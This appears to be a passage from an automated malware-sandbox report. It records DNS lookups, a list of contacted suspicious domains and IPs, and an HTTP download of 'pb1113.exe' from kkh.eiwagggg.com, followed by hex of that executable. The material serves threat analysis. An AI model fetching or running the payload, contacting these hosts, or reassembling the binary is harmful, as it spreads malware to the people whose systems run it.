                                                                                                                Oct 13, 2022 13:08:11.740854025 CEST8.8.8.8192.168.2.50x1b0No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:11.740854025 CEST8.8.8.8192.168.2.50x1b0No error (0)star-mini.c10r.facebook.com157.240.20.35A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:11.941704988 CEST8.8.8.8192.168.2.50x5149No error (0)avtlsgosecure.com176.124.192.220A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:12.230778933 CEST8.8.8.8192.168.2.50xadb5No error (0)avtlsgosecure.com176.124.192.220A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:12.418117046 CEST8.8.8.8192.168.2.50xb65cNo error (0)avtlsgosecure.com176.124.192.220A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:12.614674091 CEST8.8.8.8192.168.2.50xe34eNo error (0)avtlsgosecure.com176.124.192.220A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:12.841995955 CEST8.8.8.8192.168.2.50x37deNo error (0)avtlsgosecure.com176.124.192.220A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:13.042471886 CEST8.8.8.8192.168.2.50xcda7No error (0)avtlsgosecure.com176.124.192.220A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:13.322277069 CEST8.8.8.8192.168.2.50x3280No error (0)keziheritier.com66.96.149.30A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:15.778620005 CEST8.8.8.8192.168.2.50xdf9eNo error (0)avtlsgosecure.com176.124.192.220A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:15.985240936 CEST8.8.8.8192.168.2.50x98baNo error (0)avtlsgosecure.com176.124.192.220A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:16.036717892 CEST8.8.8.8192.168.2.50xfd72No error (0)aaa.apiaaaeg.com45.136.151.102A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:16.179136992 CEST8.8.8.8192.168.2.50xc69bNo error (0)keziheritier.com66.96.149.30A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:16.345180035 CEST8.8.8.8192.168.2.50xa41cNo error (0)aaa.apiaaaeg.com45.136.151.102A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:17.133971930 CEST8.8.8.8192.168.2.50xd59aNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:17.133971930 CEST8.8.8.8192.168.2.50xd59aNo error (0)star-mini.c10r.facebook.com31.13.92.36A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:17.630275965 CEST8.8.8.8192.168.2.50x89f3No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:17.630275965 CEST8.8.8.8192.168.2.50x89f3No error (0)star-mini.c10r.facebook.com157.240.20.35A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:18.827599049 CEST8.8.8.8192.168.2.50x55d2No error (0)avtlsgosecure.com176.124.192.220A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:19.161294937 CEST8.8.8.8192.168.2.50x8cdeNo error (0)avtlsgosecure.com176.124.192.220A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:19.380685091 CEST8.8.8.8192.168.2.50xf0a4No error (0)avtlsgosecure.com176.124.192.220A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:19.600060940 CEST8.8.8.8192.168.2.50xb4dNo error (0)libapi.tourl.pics100.42.65.201A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:20.627914906 CEST8.8.8.8192.168.2.50x7db0No error (0)jamesmillion.xyz104.192.2.242A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:21.259123087 CEST8.8.8.8192.168.2.50x995eNo error (0)avtlsgosecure.com176.124.192.220A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:28.170486927 CEST8.8.8.8192.168.2.50x342aNo error (0)api.2ip.ua162.0.217.254A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:40.526429892 CEST8.8.8.8192.168.2.50xe799No error (0)get.geojs.io104.26.0.100A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:40.526429892 CEST8.8.8.8192.168.2.50xe799No error (0)get.geojs.io172.67.70.233A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:40.526429892 CEST8.8.8.8192.168.2.50xe799No error (0)get.geojs.io104.26.1.100A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:51.807053089 CEST8.8.8.8192.168.2.50xcd1No error (0)en.xml-post.xyz198.135.55.114A (IP address)IN (0x0001)false
                                                                                                                Oct 13, 2022 13:08:51.807219028 CEST8.8.8.8192.168.2.50x8491No error (0)en.eredirected.xyz198.135.55.114A (IP address)IN (0x0001)false
                                                                                                                • kkh.eiwagggg.com
                                                                                                                • pelegisr.com
                                                                                                                • www.facebook.com
                                                                                                                • www.rukangiralawchambers.org
                                                                                                                • github.com
                                                                                                                • keziheritier.com
                                                                                                                • jxgxe.org
                                                                                                                  • furubujjul.net
                                                                                                                • erlmaqaee.com
                                                                                                                • hbcgxocfi.net
                                                                                                                • qbaff.net
                                                                                                                • qjfwyiswqf.org
                                                                                                                • uywhkxoed.org
                                                                                                                • osqxrahfo.net
                                                                                                                • ekwvv.com
                                                                                                                • 45.138.74.52
                                                                                                                • gqesn.com
                                                                                                                • kmbcjpnhmn.com
                                                                                                                • vfnfj.com
                                                                                                                • 179.43.163.115
                                                                                                                • ikrffkiyo.net
                                                                                                                • cluvur.net
                                                                                                                • ogumtw.org
                                                                                                                • penvasmsfn.net
                                                                                                                • yupxpeh.com
                                                                                                                • elepmy.net
                                                                                                                • musgiffp.com
                                                                                                                • mosxiihyx.org
                                                                                                                • erwwlrd.net
                                                                                                                • rplmdlqvb.org
                                                                                                                • uxbnplb.com
                                                                                                                  • avtlsgosecure.com
                                                                                                                • ttkphlkd.com
                                                                                                                • acwsosy.org
                                                                                                                • hhnjmhndyi.org
                                                                                                                • mumrxhscl.com
                                                                                                                • sbclkddt.org
                                                                                                                • gwduafudxk.org
                                                                                                                • oluukivxak.org
                                                                                                                • urtpdj.net
                                                                                                                • qcouemgwhe.net
                                                                                                                • iveusnelmb.net
                                                                                                                • feguaryku.org
                                                                                                                • xaxubvgaxp.com
                                                                                                                • hgtoajitw.com
                                                                                                                • qatdmt.com
                                                                                                                • taycucfic.com
                                                                                                                • yflhmtrc.net
                                                                                                                • sqpwbiet.org
                                                                                                                • ecyhmxgsfc.org
                                                                                                                • mnbmwy.net
                                                                                                                • ouoadwsue.net
                                                                                                                • meodpejlxy.org
                                                                                                                • otrdotvq.org
                                                                                                                • thytbewb.com
                                                                                                                • cgrdihsvb.org
                                                                                                                • nubtbm.com
                                                                                                                • tsfbujs.com
                                                                                                                • ohjxgaebo.net
                                                                                                                • oqngiychus.com
                                                                                                                • xmxbixt.net
                                                                                                                • rrmxi.net
                                                                                                                • ymvtebx.net
                                                                                                                • sxbykepfr.com
                                                                                                                • pkuitvuub.net
                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                0192.168.2.549699172.67.144.83443C:\Windows\explorer.exe
                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                2022-10-13 11:07:30 UTC0OUTGET /files/pe/pb1113.exe HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Host: kkh.eiwagggg.com
                                                                                                                2022-10-13 11:07:30 UTC0INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 13 Oct 2022 11:07:30 GMT
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Length: 3639808
                                                                                                                Connection: close
                                                                                                                Last-Modified: Tue, 11 Oct 2022 09:57:46 GMT
                                                                                                                ETag: "63453e1a-378a00"
                                                                                                                Cache-Control: max-age=14400
                                                                                                                CF-Cache-Status: HIT
                                                                                                                Age: 4024
                                                                                                                Accept-Ranges: bytes
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=nS8J4HTQtp8yfEg%2FWy6xZYCw8T9KICB4T1DI5tyUADntJfljMed7uz31z6l0lt39tGtjFH0oIU4Fe2X1VINwBtX8ghojS8J9f4E7tL32b1w%2BuOLRqUIFHD%2FpH1HKG%2F9%2FSRi5"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 75979cac4dfe91f6-FRA
                                                                                                                alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                2022-10-13 11:07:30 UTC0INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 07 00 02 3e 45 63 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 0e 1b 00 06 0e 00 00 da 04 00 00 00 00 00 f0 aa 49 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 60 00 00 04 00 00 00 00 00 00 02 00 20 80 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00
                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd>Ec#I@`
                                                                                                                2022-10-13 11:07:30 UTC1INData Raw: 37 00 00 60 29 00 00 86 37 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                Data Ascii: 7`)7`h
                                                                                                                2022-10-13 11:07:30 UTC2INData Raw: d1 38 df a0 51 d1 e7 c5 00 b1 d1 54 d9 6d a8 2e f6 6d ca af d1 e0 9a 04 a9 2e 25 f4 80 a4 2e e4 dc cf b6 2e d4 ea b0 c0 fc ff ff ff 1c ec ce 9e 99 1b a4 04 91 bc 9a 0e 69 00 9b 91 e5 92 ff 6c 99 3a 98 ff 9a 5a b8 9f ff a3 64 75 72 00 bb c8 87 79 00 1f 9f 09 85 ff 7a 94 c8 7b 00 65 df fa 71 00 0a d8 51 71 00 61 4d 2a 89 ff f8 4e 61 70 00 eb fd 8a 8b ff 38 85 55 81 ff 5e 16 d7 86 ff f7 78 1a 6b 00 af 24 e8 60 00 d7 0b 66 9c ff d6 70 a7 62 00 9d fc c6 9c ff 22 5d 2a 5e a7 fa 22 9b 07 fe e7 2e 29 a1 62 fe ed 30 fb fa 73 c4 43 ed f7 f8 a8 e0 d9 7c 8b 0d c5 79 8e 9e 77 5b 59 1b ee 72 ac c7 eb ed 1c 25 9e e8 41 df f1 d5 44 3a da 96 a5 bf ba 5c 9e 07 bf 67 50 2c a1 e2 66 93 35 fb 63 5b ba 46 ed df e0 d6 e5 d9 64 8b 73 c0 79 8e ae 09 5e 59 2a 66 0c a9 c7 62 b9 91
                                                                                                                Data Ascii: 8QTm.m.%..il:Zduryz{eqQqaM*Nap8U^xk$`fpb"]*^".)b0sC|yw[Yr%AD:\gP,f5c[Fdsy^Y*fb
                                                                                                                2022-10-13 11:07:30 UTC4INData Raw: b8 a2 73 f8 bd 35 ae c1 5e b0 6c 6d d8 04 68 d9 44 ab 12 5c a2 28 08 26 27 59 8d 2d 86 5c 3c f7 b3 a6 b8 e4 f2 44 38 e1 e9 77 c2 85 6b 0c c6 b1 53 e0 44 c5 bd 81 94 d1 8f 64 ea 21 1d 13 87 1f 87 c5 36 cc 11 7e 3a 2a 7a eb 20 1d 31 81 e5 9d c5 e2 1a 6d eb e2 65 97 a3 dd e2 c1 f5 6f 60 3a a0 a8 ee 12 1d 1b d1 40 2e 1d bd 09 36 8a c5 30 e0 ae e7 e2 7f 4b 3b 77 3a fa d0 35 8e c5 36 e6 cf d0 e2 ad 65 c1 6d 3a 06 3e 49 1b 1d 41 23 87 2d 1d 75 49 4b 90 c5 1c 76 a2 b3 a0 9d c6 1b 44 98 71 07 68 2a 74 4a 02 0f 5a ce 3a 84 07 f8 3e 27 88 b5 5e a3 86 4b ac 04 83 db 62 df 12 5e 80 0e 7c 26 04 e3 ab 59 86 e6 86 d1 c7 a6 03 a6 d4 30 38 a3 ad ba b9 61 a8 49 79 6d 2a 4c 1a 7c 0a 5a 9f ca fa 02 f8 cf 7f f6 b0 5e fb c6 35 a9 04 c2 5b 1c da 12 de 08 70 79 26 8d b3 d5 5c 86
                                                                                                                Data Ascii: s5^lmhD\(&'Y-\<D8wkSDd!6~:*z 1meo`:@.60K;w:56em:>IA#-uIKvDqh*tJZ:>'^Kb^|&Y08aIym*L|Z^5[py&\
                                                                                                                2022-10-13 11:07:30 UTC5INData Raw: 4d 69 24 bd bb 72 3b be 15 88 4e 1e 5a ae 75 a3 e9 9c 15 99 29 69 fd 80 05 ff 3b da 95 69 c5 3c 1c 4b e6 24 1d 9f 15 d6 a9 59 2c f6 e9 71 ef 8f 83 6f 38 53 fe ff ff 6f d0 1c 54 30 1b da 84 ec ff ff ff 6f f9 04 60 42 f3 f9 d2 95 71 66 5f b6 15 80 ee 41 62 6a 4c e6 75 e5 32 be ec fa 8f 4a 0e 69 07 ff ff ff 7f f2 87 77 57 2c e2 9b e2 95 6c 38 77 8b 15 9e 0a bf 10 cd fc c4 80 3c ca 71 4a 03 70 c1 53 9d f8 ff ff ff 3f 33 b2 e4 32 33 d1 4c 95 35 5b 42 28 3f 5f 2f 10 7f ad 84 fd df ff 95 8f 0f 87 5e 15 d1 cf 98 c8 b2 04 c5 f9 df 19 7c 01 af 5d 85 de 98 ad 15 70 d7 69 b8 15 e1 b2 b7 b0 b5 41 e6 6b 00 bb 72 04 ed 87 dd ec 95 15 8c fe 03 cd 38 39 82 15 4e 98 29 02 55 10 ec 31 0c 19 d2 2a 34 35 2a 7f 45 b7 b2 95 e5 29 00 0f 04 cb ca 72 42 eb 5c db e7 7d ca 95 79 58
                                                                                                                Data Ascii: Mi$r;NZu)i;i<K$Y,qo8SoT0o`Bqf_AbjLu2JiwW,l8w<qJpS?323L5[B(?_/^|]piAkr89N)U1*45*E)rB\}yX
                                                                                                                2022-10-13 11:07:30 UTC6INData Raw: 28 90 6b 85 b6 cf f4 d3 1a 15 18 e9 ff ff ff 95 af 15 00 80 c2 f8 8f 4c ec 5a c4 06 44 98 34 36 80 34 9e 65 3f 80 13 ae f8 8f d9 b6 de c2 06 9e 8f e6 e7 e9 ff ff ff cd e6 c4 ff b9 f3 cd 6f 24 44 94 3b 08 8f 24 5b 65 1d 56 f8 cb 06 2f d9 11 ce 05 e7 7c 50 85 9d 99 d3 32 cd cd 7f a6 06 73 31 80 4d 8a fa 8f 51 d1 9a ce 07 b5 31 14 18 16 00 00 80 e1 9d 13 00 05 44 fd 8f 99 80 3c c1 07 85 3d bb e6 e2 dc ef 39 0b e1 47 e3 e7 e9 ff ff 7f 10 e3 38 00 c6 3c 7d 65 b8 bb da 3d 09 e1 c7 13 3a fb d4 ff 09 b8 e9 ff ff ff 23 09 0f 40 fd 5a ea ee 3f c6 15 4f 12 c0 fa 30 ec ff 59 4a df 17 b9 25 a4 11 c0 28 cd 5c e0 44 94 c9 ed 36 1c 8c 91 50 89 69 17 10 ad af 5d 19 b8 22 b3 28 f8 e8 ff ff ff d5 4f 23 00 9c 7c 7f c7 7f d5 5d 3b 40 00 94 01 3e 0b a6 c3 20 69 df 59 f6 8c cb
                                                                                                                Data Ascii: (kLZD464e?o$D;$[eV/|P2s1MQ1D<=9G8<}e=:#@Z?O0YJ%(\D6Pi]"(O#|];@> iY
                                                                                                                2022-10-13 11:07:30 UTC8INData Raw: 99 40 a1 d5 38 a0 27 fc f2 e4 80 cd 6f 5f 73 3e 7b cb 07 86 32 55 c5 e9 cc 15 2b d7 db 2c 48 6c a3 27 e7 3e c5 08 5b 1e e7 97 67 91 ca 63 39 a0 22 9c 15 e4 5b 4d 77 13 e4 6a 94 40 94 c6 e5 bb 03 ef 1b d4 4e de e5 1b 21 a3 1b e0 1b 4c 3a 1c e0 1b 11 43 60 62 39 d8 d4 05 17 e4 f0 d2 c0 9d c6 bf f1 f1 6f 39 26 f0 f0 16 e4 45 77 1b 10 e4 90 2e 2c 97 c6 67 51 6f ec 1b 3a bc b2 e6 1b b7 c9 77 e3 1b fe c0 70 e3 1b 5b d9 0c 61 39 42 c3 9d 57 ed c5 e8 21 b6 9c 9a 41 06 ff fe ff ff ff d1 40 81 92 ca 47 f1 80 92 95 ae c6 83 b2 41 5b 9c 70 cd 0d b8 ad 8b b2 ed 6b d4 7c 0d 50 ad 5e 7c 0d e9 d6 a2 8f 12 47 b6 62 74 0d 91 52 6a 73 4d 09 79 51 89 52 8d 1d f4 77 0d 57 15 ea 75 6d ff cc dd 76 4d 7c a9 87 85 32 6b d2 b6 7e 4d 9b 19 cf 89 f2 5a 8f 45 89 f2 8c 74 b9 7a ed fe
                                                                                                                Data Ascii: @8'o_s>{2U+,Hl'>[gc9"[Mwj@N!L:C`b9o9&Ew.,gQo:wp[a9BW!A@GA[pk|P^|GbtRjsMyQRwWumvM|2k~MZEtz
                                                                                                                2022-10-13 11:07:30 UTC9INData Raw: a9 63 19 57 ac 15 a2 6c 2a 10 46 a7 0b 5a c3 ce 21 03 f8 cb 2b 2d b1 5e af a2 ee a8 04 a7 e7 c7 db 12 63 64 ab 78 26 e1 e7 0e 5d 86 e2 a2 74 c3 a6 26 7a 71 34 38 7e 99 1f bd 61 9d d5 dc 69 2a d0 8e d9 0e 5a 0b 46 5f 06 f8 43 d3 53 b4 5e 57 52 90 ad 04 57 77 b9 de 12 f2 04 d5 7d 26 81 97 70 58 86 93 6a 10 49 7a d6 1e 6d 22 ac ea f5 d1 bd 81 56 3f cf 74 33 88 c5 94 e4 38 fa e2 57 8d 96 c6 e2 e1 95 e0 62 3a ac dc 78 0f 1d 43 ef ed 9f c5 5e 34 e3 66 3a d2 92 19 38 1d d9 71 17 85 c5 12 3a 9f f3 e2 45 87 51 c5 e2 d1 1d 9d 78 3a 48 78 1c 0a 1d cb 09 b2 36 1d 65 e1 c4 92 c5 d8 c8 5c ff e2 57 f3 c9 6f 3a 42 58 c7 96 c5 be be 3d c8 e2 f5 12 79 b0 60 43 31 00 55 47 0b 30 a9 c7 0e 60 5e 20 9e 65 bc 9d f4 d5 b8 5f 98 93 a5 db 0f 1e 9b 07 0b 02 12 29 a1 87 33 d1 30 fb
                                                                                                                Data Ascii: cWl*FZ!+-^cdx&]t&zq48~ai*ZF_CS^WRWw}&pXjIzm"V?t38Wb:xC^4f:8q:EQx:Hx6e\Wo:BX=y`C1UG0`^ e_)30
                                                                                                                2022-10-13 11:07:30 UTC10INData Raw: 53 69 f4 64 0b a1 3e 4e 49 0b 2a ae f5 b5 f4 eb 52 49 ba f4 3f 97 45 4c 0b 1c b9 47 52 0b aa 07 62 45 0b 8a dc 1f 85 f4 12 72 c6 4b 0b 81 a6 33 5a 0b ba 35 77 57 0b 95 5f e2 94 f4 83 20 58 b9 f4 20 98 e3 45 0b f5 34 5f 4a 0b 51 4f a1 be f4 25 47 b0 ef eb 09 d1 6f 74 36 10 33 9f a2 e1 54 4b 12 57 84 33 72 64 59 e6 db 0f 35 d4 51 4b 0a 4f cb 32 8e 57 94 d1 e7 84 74 b7 5f 84 90 ff ee 22 70 b5 17 43 bc b4 d5 04 3c c1 05 78 56 5c 4b e3 b6 90 47 57 48 c5 ff 0f ca 3d 56 14 9f 6f 52 4b ef 8d 23 be b4 8c 4f 11 a2 fa 5e 1b f1 a2 dd 18 8c cf be c8 85 dd fd 0f 43 df bf 19 58 46 75 ce e8 0c 04 8d 31 3e 83 2a 00 38 8e df a7 b4 ec de 23 00 fa 4f ea 40 4b 1c 01 21 48 03 9a 24 63 df 5d d8 ff b5 a1 a9 5d 4b af f4 6f cc 5a f8 bd d6 b3 16 4d 8e 53 9c 7c bf 78 ea 8f b0 7a 10
                                                                                                                Data Ascii: Sid>NI*RI?ELGRbErK3Z5wW_ X E4_JQO%Got63TKW3rdY5QKO2Wt_"pC<xV\KGWH=VoRK#O^CXFu1>*8#O@K!H$c]]KoZMS|xz
                                                                                                                2022-10-13 11:07:30 UTC12INData Raw: e3 1e 2a 2d 32 92 47 aa e4 9a 8c 93 d5 8c b2 88 13 2a 80 fc 85 78 aa 9a 89 99 72 aa 7f db 75 aa aa 95 44 99 e5 d5 de 05 d8 b9 55 47 51 af 38 2a 0b 2a e4 56 aa 9c c9 b2 f9 d5 3b 30 c3 a0 55 ea 90 dd 74 2a 76 18 d9 f4 d5 da f6 d4 9f 55 88 93 c8 95 55 71 d9 24 4d 55 37 10 92 6a c3 db e2 ef 04 62 80 76 40 84 e9 ad ad a0 d0 10 c6 fc 7d ac d3 7e 10 dd c7 61 51 c4 5c 51 7a 26 a9 07 fd 59 df 65 9d b6 1a 79 3b 34 f1 da 3c 59 76 67 9d 31 84 67 d0 c4 c7 24 0f 85 da cc b5 47 84 db 79 6e a7 d0 a8 62 3f 7a ac 55 f2 d3 da c7 95 bd 07 5b 51 b4 e2 6a 00 fd 91 eb a6 9a b6 0a 9d f8 33 f1 52 4b d6 93 2a 20 70 07 99 b1 85 8b 14 68 05 1d af 8c 7e df 5b 95 74 d4 0b a0 6a 36 56 6a 66 95 82 34 e9 41 95 1c b8 72 5d 95 dd 77 9e a6 6a d0 ea 85 61 95 73 df ba 4b 95 11 0b a3 50 95 3f
                                                                                                                Data Ascii: *-2G*xruDUGQ8**V;0Ut*vUUq$MU7jbv@}~aQ\Qz&Yey;4<Yvg1g$Gynb?zU[Qj3RK* ph~[tj6Vjf4Ar]wjasKP?
                                                                                                                2022-10-13 11:07:30 UTC13INData Raw: 95 6f 7f ba 8b 6a fd 45 39 ac 6a 23 f1 a2 b0 6a a0 60 38 ac 21 b7 72 f1 86 9a e8 72 88 5b 6f ed af 82 5b d6 b8 6a 87 5b b7 e1 6d 87 5b 1e 60 11 05 79 17 1f 74 70 a4 cf a1 b1 fa 86 f4 d2 80 08 79 dd 43 81 71 a4 1a 6c 6a 77 a4 3f cd 5d f0 86 88 da 1e 8b 5b b5 2f c3 81 5b a0 82 06 84 5b b5 8b 01 84 5b 98 bc 1f 52 a3 f8 78 5a 40 00 00 00 00 d3 e3 bc a5 e7 29 84 d2 1c f1 40 31 ab fd de 41 10 1e e1 63 59 b4 d7 66 90 76 62 85 c1 10 9d 79 32 7a 6d 11 ed 59 fd 52 32 df 8a 72 34 9d 9a f2 ac 9c dc 00 94 68 44 c4 ec eb 29 87 fa 7d 2d 39 45 36 cb ad f6 5b 8c 92 2a 82 9d f4 55 b5 13 fe 4b 5c e9 1e 01 f4 ea 7a dd 89 b2 fb ac 91 2f ad b0 21 06 d4 83 96 5c ff 0b 35 8e bd 93 1c f7 0a 6d ff ff ff ff ff f2 a1 c8 1b df 93 8f 76 0d 9b db 18 83 12 5c b8 f0 ed b0 40 6b 19 c9 2c
                                                                                                                Data Ascii: ojE9j#j`8!rr[o[j[m[`ytpyCqljw?][/[[[RxZ@)@1AcYfvby2zmYR2r4hD)}-9E6[*UK\z/!\5mv\@k,
                                                                                                                2022-10-13 11:07:30 UTC14INData Raw: b7 55 22 f7 4e 67 c3 fa b1 c0 6e a3 46 e7 75 ad 40 76 dc 78 da f7 87 ec 51 a2 ab c9 1b c3 13 85 c5 24 91 d3 76 00 47 2c 15 3b 83 06 64 6d 15 9f 25 a5 37 f9 5c 4e ee d4 2c d7 d4 e6 0e b1 ca b4 29 3f 1b 0e e6 7e ad 2d de dd 73 da c2 a7 ed 5a a2 6e 49 1a c8 13 35 55 25 9a d3 fe 98 46 27 15 ae e3 07 6f 6d 85 af 24 ae 37 b1 96 3e 1e 6a c4 ab 7d 48 ea f5 73 5e f2 b2 31 a5 eb 2b 35 7f c1 1f 6a 25 5b f5 e8 b2 eb 89 f7 95 dd 3e a3 a1 4c 2d a8 94 ff 2c e6 30 ad a3 54 61 6a ad 3b 34 5e b3 fa 85 95 e4 fc b2 60 f0 8f 81 a5 44 53 fe ff ff cf 77 5c 20 2a 95 cd bc 85 f3 80 57 68 40 d4 9d 19 31 0d a3 97 55 c3 47 b6 a1 f5 6e 0b 91 aa 1c 19 0b 38 f4 34 28 33 47 32 17 63 42 ed ec 22 6e c1 cf 18 36 7a 13 ff ff ff 4f de 7a b2 15 3c 0a d9 28 6a fc 5e 4a e9 32 2a d0 3d 70 76 4e
                                                                                                                Data Ascii: U"NgnFu@vxQ$vG,;dm%7\N,)?~-sZnI5U%F'om$7>j}Hs^1+5j%[>L-,0Taj;4^`DSw\ *Wh@1UGn84(3G2cB"n6zOz<(j^J2*=pvN
                                                                                                                2022-10-13 11:07:30 UTC16INData Raw: 47 f8 5b de 71 ea e1 52 0a 41 65 2a b9 10 a6 7b d7 b5 c6 b8 8d d4 46 e1 2b 1c d7 46 0a a8 c6 27 49 bb 38 48 d8 b6 4a 2c ed d3 46 cf 7e 4b 29 48 3e 56 57 2a b9 dd a2 7a 20 ba a3 26 e7 d2 b7 56 fd 5f d6 46 2c 9a 41 2b 4a 6a 34 b7 28 b9 d5 3f 26 2b b9 3e dc fc db b6 ef 6c 72 24 49 9e f8 d7 2f b9 db c1 85 d3 b9 7d 40 0b f8 17 00 00 00 6d e4 fb ff 5b 9d ba d8 05 85 a9 68 23 3a a3 8f b8 60 bb 9f 40 be c2 50 84 c4 d2 06 9f b3 14 cf a6 d9 a2 b9 ea a0 6a 30 dc f7 79 55 ff 87 2a 4f 7b ab a2 b2 14 38 26 b5 5a ac 61 e4 f8 f3 39 7e db f7 5f 31 bd 2f e1 e7 ec 27 0b 89 22 67 d8 37 c2 c7 21 fb 3a 3a 55 fa 7e 09 6b 08 db 7f 56 5c ff e7 16 00 00 00 64 72 2b 00 b1 1a d5 65 f6 ca 37 b9 35 c5 e1 57 a8 8d a2 1e fc fb 85 78 a6 d3 f5 88 ac 77 4b a6 2a 0e de 47 d1 ec 1c 8b 0b ca
                                                                                                                Data Ascii: G[qRAe*{F+F'I8HJ,F~K)H>VW*z &V_F,A+Jj4(?&+>lr$I/}@m[h#:`@Pj0yU*O{8&Za9~_1/'"g7!::U~kV\dr+e75WxwK*G
                                                                                                                2022-10-13 11:07:30 UTC17INData Raw: 5b d5 c0 70 d4 40 d5 67 d7 38 bb 2a 2c 79 9e e9 0d fe a1 b7 5c 68 c2 67 6f b3 16 84 2a 47 ed a7 ea 8c cf 1d 1d b6 b6 ce d3 51 49 37 58 8d f8 0e a1 36 01 4f d5 c5 01 05 82 02 8a 87 ac 4f d5 af 98 09 2a 71 c9 16 00 41 d5 7b c4 91 b2 33 73 72 e2 b9 2a 77 2f 8d 2f 75 c6 01 33 56 d5 ea d0 b1 28 15 2c 68 aa 2a 32 dd 79 8a b1 32 59 14 68 05 1d af 8c 65 21 5e 95 39 97 bd 4e 95 5d f3 26 52 95 90 24 ca a9 6a 83 b9 d1 6e 95 9a 44 ee 44 95 46 00 f7 5f 95 f8 7c a8 9f 6a 74 10 a7 a8 6a 4c 58 30 b8 6a cb 6b 07 47 95 d9 a9 66 81 6a 59 fb e5 a6 6a 27 87 7e ba 6a 3e 98 92 41 95 51 7d 89 86 6a da 70 b6 ac 6a 6a 14 af b7 6a 02 d0 f0 77 95 24 9a fe 5b de 30 21 93 c6 cd df a0 63 39 5e 14 91 91 c6 b7 6d 90 e8 1b 20 3a 7b ee 1b ed 43 4c 69 39 0a 3c 0f 12 e4 ab 19 d2 18 e4 3e 44
                                                                                                                Data Ascii: [p@g8*,y\hgo*GQI7X6OO*qA{3sr*w//u3V(,h*2y2Yhe!^9N]&R$jnDDF_|jtjLX0jkGfjYj'~j>AQ}jpjjjw$[0!c9^m :{CLi9<>D
